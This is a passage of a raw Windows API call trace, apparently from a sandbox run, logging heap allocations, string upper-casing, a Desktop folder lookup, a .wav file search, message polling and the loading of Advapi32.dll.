0x24a9a68 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0189.024] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0189.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.024] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0189.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0189.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0189.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0189.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0189.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0189.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0189.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0189.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0189.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0189.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.028] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0189.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0189.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0189.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.029] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.029] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.029] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.030] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0189.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.031] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0189.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/SFHBP1D1LBQEeR.wav", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73e8e610, ftCreationTime.dwHighDateTime=0x1d4caed, ftLastAccessTime.dwLowDateTime=0xf1802160, ftLastAccessTime.dwHighDateTime=0x1d4d1e1, ftLastWriteTime.dwLowDateTime=0xf1802160, ftLastWriteTime.dwHighDateTime=0x1d4d1e1, nFileSizeHigh=0x0, nFileSizeLow=0x13415, dwReserved0=0x9a70006, dwReserved1=0xf883, cFileName="SFHBP1D1LBQEeR.wav", cAlternateFileName="SFHBP1~1.WAV")) returned 0xaa58a0 [0189.031] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0189.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.032] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.033] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.033] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.033] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.033] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.033] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.033] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.034] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.034] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.034] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.035] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.035] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.035] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.036] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 